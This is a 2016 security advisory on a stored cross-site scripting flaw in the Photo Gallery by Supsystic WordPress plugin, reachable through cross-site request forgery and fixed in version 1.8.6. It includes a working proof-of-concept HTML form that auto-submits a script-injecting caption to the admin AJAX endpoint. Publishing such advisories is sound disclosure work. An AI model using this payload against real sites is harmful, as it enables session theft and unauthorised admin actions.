------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Photo Gallery WordPress
Plugin
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Photo Gallery by
Supsystic WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Scripting
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing users' session tokens, or performing arbitrary
actions on their behalf. In order to exploit this issue, the attacker
has to lure/force a victim into opening a malicious website/link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
It is possible to deliver a Cross-Site Scripting attack through
Cross-Site Request Forgery. The caption text in the gallery is
vulnerable to a stored Cross-Site Scripting. The Cross-Site Scripting
attack is normaly only exploitable if the attacker has admin privileges.
However, no measures are implemented to protect against Cross-Site
Request Forgery on the request that saves the image details. Due to
this, it is possible to exploit this issue via Cross-Site Request
Forgery.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form method="post" action="http://<target>/wp-admin/admin-ajax.php">
			<input type="hidden" name="caption" value='this is the
caption"><script>alert("Fromfff CSRF to XSS!");</script>'>
			<input type="hidden" name="captionEffect" value="quarter-slide-up">
			<input type="hidden" name="description" value="">
			<input type="hidden" name="alt" value="Capture">
			<input type="hidden" name="link" value="">
			<input type="hidden" name="cropPosition" value="center-center">
			<input type="hidden" name="replace_attachment_id" value="">
			<input type="hidden" name="image_id" value="13">
			<input type="hidden" name="attachment_id" value="10">
			<input type="hidden" name="gallery_id" value="6">
			<input type="hidden" name="action" value="grid-gallery">
			<input type="hidden" name="route[module]" value="photos">
			<input type="hidden" name="route[action]" value="updateAttachment">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_photo_gallery_wordpress_plugin.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip